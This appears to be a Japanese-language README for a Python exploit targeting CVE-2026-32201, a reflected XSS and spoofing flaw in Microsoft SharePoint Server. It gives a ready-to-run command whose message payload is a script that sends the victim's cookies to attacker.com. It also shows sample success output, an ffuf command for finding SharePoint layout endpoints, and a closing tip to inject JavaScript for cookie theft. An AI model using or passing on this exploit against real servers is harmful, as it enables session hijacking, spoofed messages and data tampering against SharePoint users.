
Pythonエクスプロイト for CVE-2026-32201。Microsoft SharePoint Serverにおける反射型XSSであり、細工されたHTTPリクエストを介して、認証なしのスプーフィングとデータ改ざんを可能にします。
CVE-2026-32201 用の Python エクスプロイト - Microsoft SharePoint Server における不適切な入力検証により、認証されていないネットワークスプーフィングが可能になります (C:L/I:L)。
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
出力例:
[+] SharePoint を検出しました。
[*] スプーフィングされたリクエストを https://target.com/_layouts/15/notify.aspx に送信中
[+] ステータス: 200
[+] 成功の可能性: スプーフィングされたコンテンツについてターゲットのログ/メールを確認してください。
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message に JS を追加して Cookie を窃取します